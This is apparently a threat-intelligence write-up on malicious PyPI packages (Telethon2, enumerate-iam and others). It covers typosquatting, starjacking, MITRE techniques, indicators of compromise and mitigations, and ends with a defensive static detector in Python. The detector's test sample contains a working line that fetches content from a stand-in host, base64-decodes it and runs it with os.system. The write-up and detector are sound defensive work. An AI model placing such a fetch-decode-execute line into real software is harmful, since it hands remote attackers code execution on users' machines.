Key points
- An attacker uploaded multiple malicious PyPI packages (typosquatting and starjacking) targeting developers using Telegram, AWS, and Alibaba Cloud.
- Malicious code was embedded inside specific functions rather than in auto-executing setup files, activating only when those functions were called.
- Attack techniques used: Typosquatting (similar package names) and Starjacking (linking to unrelated popular GitHub repos to falsify popularity).
- Telethon2 copied legitimate Telethon code but inserted code in telethon/client/messages.py to fetch and decode external base64 content and run OS commands.
- enumerate-iam mimicked a popular GitHub repo that lacked a PyPI package and contained function-level code to steal sensitive credentials when executed.
- Checkmarx and other researchers (Phylum) identified and reported a list of 14 malicious packages to help defenders remediate.
MITRE Techniques
- [T1195.002] Compromise Software Dependencies and Development Tools – Attacker uploaded malicious packages to PyPI using typosquatting/starjacking: [‘uploaded a series of malicious packages to the PyPi package manager’]
- [T1036.005] Masquerading – Package names and GitHub links were used to impersonate legitimate projects: [‘mimicking a popular repo’]
- [T1027] Obfuscated Files or Information – Malicious logic was hidden inside functions to evade scanners that look for auto-executing scripts: [‘embedded malicious scripts deep within the package, within specific functions’]
- [T1105] Ingress Tool Transfer – Packages fetched external base64-encoded content from a remote domain before decoding and executing it: [‘fetches external base64-encoded content from “hxxps[:]//tg[.]aliyun-sdk-requests[.]xyz/telegram”‘]
- [T1059] Command and Scripting Interpreter – Decoded content was executed as OS commands on the host: [‘then decodes it to execute OS commands’]
- [T1552.001] Credentials in Files (Unsecured Credentials) – Malicious package functionality attempted to steal sensitive credentials when triggered: [‘attempts to steal sensitive credentials’]
Indicators of Compromise
- [Domain] Remote payload host – hxxps[:]//tg[.]aliyun-sdk-requests[.]xyz/telegram (used to fetch base64-encoded payloads)
- [Package name] Malicious PyPI packages – Telethon2, enumerate-iam, and 12 more packages (total list includes aliababcloud-tea-openapi, aliyun-oss2, aws-consoler2, etc.)
- [File/path] Malicious code locations – telethon2-1.30.3/telethon/client/messages.py (malicious lines hidden in send_message function)
- [Account] Attacker handle – kohlersbtuh15 (PyPI account used to publish packages)
In September 2023 an actor published multiple PyPI packages that impersonated legitimate projects (typosquatting) and linked to unrelated popular GitHub repositories (starjacking) to appear trustworthy. Instead of placing payloads in setup or install scripts, the attacker embedded malicious routines inside standard library functions so the code remained dormant until a developer called those functions during normal use; this evasion increases the chance of bypassing automated scanners that focus on install-time execution.
In the Telethon2 package the attacker copied legitimate Telethon source and inserted two lines inside telethon/client/messages.py that request a base64 payload from tg.aliyun-sdk-requests[.]xyz, decode it, and execute it as OS commands. Other packages (for example enumerate-iam) used the same pattern but with credential-theft logic: when specific APIs or helper functions run, they attempt to harvest sensitive credentials or configuration data. These behaviors combine supply-chain compromise (T1195.002), masquerading (T1036.005), in-place obfuscation (T1027), remote payload retrieval (T1105), and command execution (T1059).
Mitigation guidance: audit and pin direct package dependencies, monitor for newly published packages that mirror your project names, maintain placeholder packages where appropriate to prevent squatting, and scan installed libraries for network fetches or inline decoding/execution patterns. Investigate any use of the listed packages or calls to modified library functions (e.g., send_message in telethon/client/messages.py) and block the indicated domain at the network perimeter.
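As an added example (not code from the Checkmarx or Phylum research), a small static check for the pattern the mitigation guidance asks defenders to look for: it walks each function in a Python source file with the standard ast module and flags any function that combines a network fetch, a base64 decode and an OS-command or code-execution call. The SAMPLE source and the example.invalid URL are constructed stand-ins.

```python
# Static detector for the fetch / decode / execute chain described above.
# Constructed example, not Checkmarx's or Phylum's tooling.
import ast
from collections import defaultdict

# Last identifier of a call target that marks each stage of the chain.
FETCH = {"urlopen", "get", "post", "request"}    # urllib.request.urlopen, requests.get, ...
DECODE = {"b64decode", "b32decode", "a85decode"}  # base64 family
EXECUTE = {"system", "popen", "run", "call", "check_output", "exec", "eval"}

def _call_name(node: ast.Call) -> str:
    """'urlopen' for urllib.request.urlopen(...), 'exec' for exec(...), '' otherwise."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else ""

def scan_source(src: str, filename: str = "<string>") -> list[dict]:
    """One finding per function whose body contains all three stages. Requiring the
    whole chain inside one function keeps plain HTTP clients or base64 helpers unflagged."""
    try:
        tree = ast.parse(src, filename=filename)
    except SyntaxError:  # not Python, or a deliberately broken file
        return []
    findings = []
    for fn in ast.walk(tree):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        stages = defaultdict(list)  # stage name -> line numbers of matching calls
        for node in ast.walk(fn):
            if not isinstance(node, ast.Call):
                continue
            name = _call_name(node)
            for stage, names in (("fetch", FETCH), ("decode", DECODE), ("execute", EXECUTE)):
                if name in names:
                    stages[stage].append(node.lineno)
        if len(stages) == 3:
            findings.append({"file": filename, "function": fn.name,
                             "line": fn.lineno, "stages": dict(stages)})
    return findings

# Constructed stand-in for a copied library file with two injected lines.
SAMPLE = '''import base64, os, urllib.request
def send_message(self, entity, message):
    blob = urllib.request.urlopen("https://example.invalid/payload").read()
    os.system(base64.b64decode(blob).decode())
    return self._send(entity, message)
def iter_messages(self, entity):
    return self._fetch(entity)
'''
```

Run scan_source over every .py file under site-packages (reading each file's text) to triage an environment; a hit names the function and the lines of each stage so the reviewer can inspect the exact injected code rather than the whole package.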